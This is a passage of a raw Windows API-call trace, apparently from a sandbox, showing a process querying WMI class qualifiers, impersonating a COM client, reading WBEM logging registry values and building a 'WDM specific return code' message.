_SourceSize=0x20 | out: _Destination=0xcff70) returned 0x0 [0153.622] free (_Block=0xdf4e0) [0153.623] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.623] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.623] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.623] memcpy (in: _Dst=0xeae460, _Src=0x4e1c6b, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.623] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.623] malloc (_Size=0x28) returned 0xdf4e0 [0153.623] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.623] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.624] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.624] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.624] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.624] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.624] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.624] memcpy (in: _Dst=0xeae460, _Src=0x4e1d1a, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.624] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.624] malloc (_Size=0x28) returned 0xdf480 [0153.624] malloc (_Size=0x48) returned 0xdfe50 [0153.624] memmove_s (in: _Destination=0xdfe50, _DestinationSize=0x30, _Source=0xcff70, _SourceSize=0x30 | out: _Destination=0xdfe50) returned 0x0 [0153.625] free (_Block=0xcff70) [0153.625] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.625] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.625] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.625] memcpy (in: _Dst=0xeae460, _Src=0x4e1efc, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.625] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.625] malloc (_Size=0x28) returned 0xdf360 [0153.626] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.626] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.626] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.626] memcpy (in: _Dst=0xeae460, _Src=0x4e1f57, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.626] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.626] malloc (_Size=0x28) returned 0xdf300 [0153.626] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.626] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.627] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.627] memcpy (in: _Dst=0xeae460, _Src=0x4e1fbd, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.627] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.627] malloc (_Size=0x28) returned 0xdf330 [0153.627] malloc (_Size=0x68) returned 0xdfea0 [0153.627] memmove_s (in: _Destination=0xdfea0, _DestinationSize=0x48, _Source=0xdfe50, _SourceSize=0x48 | out: _Destination=0xdfea0) returned 0x0 [0153.627] free (_Block=0xdfe50) [0153.627] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.627] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.627] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.627] memcpy (in: _Dst=0xeae460, _Src=0x4e2013, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.628] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.628] malloc (_Size=0x28) returned 0xdf510 [0153.628] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.628] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.628] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.628] memcpy (in: _Dst=0xeae460, _Src=0x4e2071, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.628] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.629] malloc (_Size=0x28) returned 0xdf2d0 [0153.629] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.629] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.629] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.629] memcpy (in: _Dst=0xeae460, _Src=0x4e20df, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.629] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.630] malloc (_Size=0x28) returned 0xdf570 [0153.630] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.630] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.630] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.630] memcpy (in: _Dst=0xeae460, _Src=0x4e214e, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.630] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.630] malloc (_Size=0x28) returned 0xdf5a0 [0153.631] malloc (_Size=0x98) returned 0xdff10 [0153.631] memmove_s (in: _Destination=0xdff10, _DestinationSize=0x68, _Source=0xdfea0, _SourceSize=0x68 | out: _Destination=0xdff10) returned 0x0 [0153.631] free (_Block=0xdfea0) [0153.631] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.631] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.631] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.631] memcpy (in: _Dst=0xeae460, _Src=0x4e21b0, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.631] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.631] malloc (_Size=0x28) returned 0xdf5d0 [0153.632] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.632] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.632] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.632] memcpy (in: _Dst=0xeae460, _Src=0x4e2215, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.632] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.632] malloc (_Size=0x28) returned 0xdf600 [0153.632] SafeArrayGetElement (in: psa=0x4dcf00, rgIndices=0xeae4dc, pv=0xeae4f0 | out: pv=0xeae4f0) returned 0x0 [0153.633] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.633] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.633] memcpy (in: _Dst=0xeae460, _Src=0x4e2287, _Size=0x4 | out: _Dst=0xeae460) returned 0xeae460 [0153.633] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x0 [0153.663] malloc (_Size=0x28) returned 0xdf630 [0153.663] malloc (_Size=0x328) returned 0xdffb0 [0153.663] malloc (_Size=0x88) returned 0xdfe50 [0153.663] free (_Block=0xdfe50) [0153.663] malloc (_Size=0x88) returned 0xdfe50 [0153.663] free (_Block=0xdfe50) [0153.663] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.663] malloc (_Size=0x22) returned 0xdf660 [0153.664] malloc (_Size=0x20e) returned 0xe02e0 [0153.664] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.664] free (_Block=0xe02e0) [0153.664] malloc (_Size=0x88) returned 0xdfe50 [0153.664] free (_Block=0xdfe50) [0153.664] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.664] malloc (_Size=0x16) returned 0x1de600 [0153.664] malloc (_Size=0x20e) returned 0xe02e0 [0153.664] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.664] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.665] free (_Block=0xe02e0) [0153.665] malloc (_Size=0x88) returned 0xdfe50 [0153.665] free (_Block=0xdfe50) [0153.665] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.665] malloc (_Size=0x1e) returned 0xdf690 [0153.665] malloc (_Size=0x20e) returned 0xe02e0 [0153.665] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.665] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.665] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.665] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.665] free (_Block=0xe02e0) [0153.665] malloc (_Size=0x88) returned 0xdfe50 [0153.665] free (_Block=0xdfe50) [0153.665] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.666] malloc (_Size=0x24) returned 0xdf6c0 [0153.666] malloc (_Size=0x20e) returned 0xe02e0 [0153.666] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.666] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.666] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.666] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.666] free (_Block=0xe02e0) [0153.666] malloc (_Size=0x88) returned 0xdfe50 [0153.666] free (_Block=0xdfe50) [0153.666] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.666] malloc (_Size=0x1c) returned 0xdf6f0 [0153.666] malloc (_Size=0x20e) returned 0xe02e0 [0153.666] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.666] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.666] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.667] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.667] free (_Block=0xe02e0) [0153.667] malloc (_Size=0x88) returned 0xdfe50 [0153.667] free (_Block=0xdfe50) [0153.667] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.667] malloc (_Size=0x1c) returned 0xdf720 [0153.667] malloc (_Size=0x20e) returned 0xe02e0 [0153.667] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.667] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.667] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.667] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.667] free (_Block=0xe02e0) [0153.667] malloc (_Size=0x88) returned 0xdfe50 [0153.667] free (_Block=0xdfe50) [0153.667] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.668] malloc (_Size=0xe) returned 0x1de700 [0153.668] malloc (_Size=0x20e) returned 0xe02e0 [0153.668] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.668] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.668] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.668] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.668] free (_Block=0xe02e0) [0153.668] malloc (_Size=0x88) returned 0xdfe50 [0153.668] free (_Block=0xdfe50) [0153.668] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.668] malloc (_Size=0x24) returned 0xdf750 [0153.668] malloc (_Size=0x20e) returned 0xe02e0 [0153.668] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.668] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] free (_Block=0xe02e0) [0153.669] malloc (_Size=0x88) returned 0xdfe50 [0153.669] free (_Block=0xdfe50) [0153.669] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.669] malloc (_Size=0x22) returned 0xdf780 [0153.669] malloc (_Size=0x20e) returned 0xe02e0 [0153.669] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.669] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.669] free (_Block=0xe02e0) [0153.669] malloc (_Size=0x88) returned 0xdfe50 [0153.670] free (_Block=0xdfe50) [0153.670] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.670] malloc (_Size=0x1e) returned 0xdf7b0 [0153.670] malloc (_Size=0x20e) returned 0xe02e0 [0153.670] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.670] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.670] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.670] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.670] free (_Block=0xe02e0) [0153.670] malloc (_Size=0x88) returned 0xdfe50 [0153.670] free (_Block=0xdfe50) [0153.670] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.670] malloc (_Size=0x24) returned 0xdf7e0 [0153.670] malloc (_Size=0x20e) returned 0xe02e0 [0153.670] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] free (_Block=0xe02e0) [0153.671] malloc (_Size=0x88) returned 0xdfe50 [0153.671] free (_Block=0xdfe50) [0153.671] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.671] malloc (_Size=0x22) returned 0xdf810 [0153.671] malloc (_Size=0x20e) returned 0xe02e0 [0153.671] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.671] free (_Block=0xe02e0) [0153.672] malloc (_Size=0x88) returned 0xdfe50 [0153.672] free (_Block=0xdfe50) [0153.672] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.672] malloc (_Size=0x18) returned 0x1de170 [0153.672] malloc (_Size=0x20e) returned 0xe02e0 [0153.672] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.672] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.672] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.672] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.672] free (_Block=0xe02e0) [0153.672] malloc (_Size=0x88) returned 0xdfe50 [0153.672] free (_Block=0xdfe50) [0153.672] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.672] malloc (_Size=0x22) returned 0xdf840 [0153.673] malloc (_Size=0x20e) returned 0xe02e0 [0153.673] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.673] free (_Block=0xe02e0) [0153.673] malloc (_Size=0x88) returned 0xdfe50 [0153.673] free (_Block=0xdfe50) [0153.673] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.673] malloc (_Size=0x36) returned 0xcff70 [0153.673] malloc (_Size=0x20e) returned 0xe02e0 [0153.673] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.673] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.674] free (_Block=0xe02e0) [0153.674] malloc (_Size=0x88) returned 0xdfe50 [0153.674] free (_Block=0xdfe50) [0153.674] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.674] malloc (_Size=0x34) returned 0xdfe50 [0153.674] malloc (_Size=0x20e) returned 0xe02e0 [0153.674] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.674] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.674] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.674] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.674] free (_Block=0xe02e0) [0153.674] malloc (_Size=0x88) returned 0xe02e0 [0153.674] free (_Block=0xe02e0) [0153.675] ?Get@CWbemObject@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ2@Z () returned 0x0 [0153.675] malloc (_Size=0x16) returned 0xdfaf0 [0153.675] malloc (_Size=0x20e) returned 0xe02e0 [0153.675] ?GetPropertyQualifierSet@CWbemClass@@UEAAJPEBGPEAPEAUIWbemQualifierSet@@@Z () returned 0x0 [0153.675] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.675] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.675] ?Get@CQualifierSet@@UEAAJPEBGJPEAUtagVARIANT@@PEAJ@Z () returned 0x80041002 [0153.675] free (_Block=0xe02e0) [0153.675] malloc (_Size=0x88) returned 0xe02e0 [0153.675] free (_Block=0xe02e0) [0153.675] free (_Block=0xdf600) [0153.675] free (_Block=0xdf4b0) [0153.675] free (_Block=0xdf510) [0153.675] free (_Block=0xdf630) [0153.676] free (_Block=0xdf480) [0153.676] free (_Block=0xdf5d0) [0153.676] free (_Block=0xdf300) [0153.676] free (_Block=0xdf330) [0153.676] free (_Block=0xdf540) [0153.676] free (_Block=0xdf450) [0153.676] free (_Block=0xdf2d0) [0153.676] free (_Block=0xdf3f0) [0153.676] free (_Block=0xdf3c0) [0153.676] free (_Block=0xdf4e0) [0153.676] free (_Block=0xdf5a0) [0153.677] free (_Block=0xdf570) [0153.677] free (_Block=0xdf360) [0153.677] free (_Block=0xdff10) [0153.677] GetProcAddress (hModule=0x7fefdf90000, lpProcName=0x10) returned 0x7fefdf94170 [0153.677] malloc (_Size=0x4a8) returned 0xe02e0 [0153.677] CoGetCallContext (in: riid=0x7fef6df1610*(Data1=0x13e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppInterface=0xeae798 | out: ppInterface=0xeae798*=0x4ba9a0) returned 0x0 [0153.677] CServerSecurity::ImpersonateClient () returned 0x0 [0153.677] CServerSecurity::Release () returned 0x1 [0153.677] GetCurrentThread () returned 0xfffffffffffffffe [0153.677] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0xeae7e0 | out: TokenHandle=0xeae7e0*=0x224) returned 1 [0153.677] GetTokenInformation (in: TokenHandle=0x224, TokenInformationClass=0x9, TokenInformation=0xeae7d0, TokenInformationLength=0x4, ReturnLength=0xeae7d8 | out: TokenInformation=0xeae7d0, ReturnLength=0xeae7d8) returned 1 [0153.677] CloseHandle (hObject=0x224) returned 1 [0153.678] WmiOpenBlock () returned 0x1068 [0153.678] GetTickCount () returned 0x205b1db [0153.678] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0xeae708, lpdwDisposition=0xeae6a0 | out: phkResult=0xeae708*=0x224, lpdwDisposition=0xeae6a0*=0x2) returned 0x0 [0153.678] RegQueryValueExW (in: hKey=0x224, lpValueName="Logging", lpReserved=0x0, lpType=0xeae674, lpData=0xeae680, lpcbData=0xeae670*=0x19 | out: lpType=0xeae674*=0x1, lpData="0", lpcbData=0xeae670*=0x4) returned 0x0 [0153.678] RegQueryValueExW (in: hKey=0x224, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0xeae674, lpData=0xeae680, lpcbData=0xeae670*=0x19 | out: lpType=0xeae674*=0x1, lpData="65536", lpcbData=0xeae670*=0xc) returned 0x0 [0153.679] RegCloseKey (hKey=0x224) returned 0x0 [0153.679] _vsnwprintf (in: _Buffer=0xe0374, _BufferCount=0x1ff, _Format="WDM specific return code: %lu\n", _ArgList=0xeae7b8 | out: _Buffer="WDM specific return code: 4200\n") returned 31 [0153.712] ?SpawnInstance@CWbemClass@@UEAAJJPEAPEAUIWbemClassObject@@@Z () returned 0x0 [0153.712] ?Put@CWbemInstance@@UEAAJPEBGJPEAUtagVARIANT@@J@Z () returned 0x0 [0153.714] malloc (_Size=0x40) returned 0xdfe90 [0153.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WDM specific return code: 4200\n", cchWideChar=32, lpMultiByteStr=0xdfe90, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WDM specific return code: 4200\n", lpUsedDefaultChar=0x0) returned 32 [0153.714] GetTickCount () returned 0x205b20a [0153.714] free (_Block=0xdfe90) [0153.714] GetTickCount () returned 0x205b20a [0153.714] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.714] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.714] free (_Block=0xe02e0) [0153.714] ?Release@CWbemObject@@UEAAKXZ () returned 0x0 [0153.714] free (_Block=0xdfe00) [0153.714] free (_Block=0xdfaf0) [0153.714] free (_Block=0xdfe50) [0153.714] free (_Block=0xcff70) [0153.714] free (_Block=0xdf840) [0153.714] free (_Block=0x1de170) [0153.714] free (_Block=0xdf810) [0153.715] free (_Block=0xdf7e0) [0153.715] free (_Block=0xdf7b0) [0153.715] free (_Block=0xdf780) [0153.715] free (_Block=0xdf750) [0153.715] free (_Block=0x1de700) [0153.715] free (_Block=0xdf720) [0153.715] free (_Block=0xdf6f0) [0153.715] free (_Block=0xdf6c0) [0153.715] free (_Block=0xdf690) [0153.715] free (_Block=0x1de600) [0153.715] free (_Block=0xdf660) [0153.715] free (_Block=0xdffb0) [0153.715] free (_Block=0xdf420) [0153.715] free (_Block=0xdf390) [0153.715] free (_Block=0xdc8d0) [0153.715] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 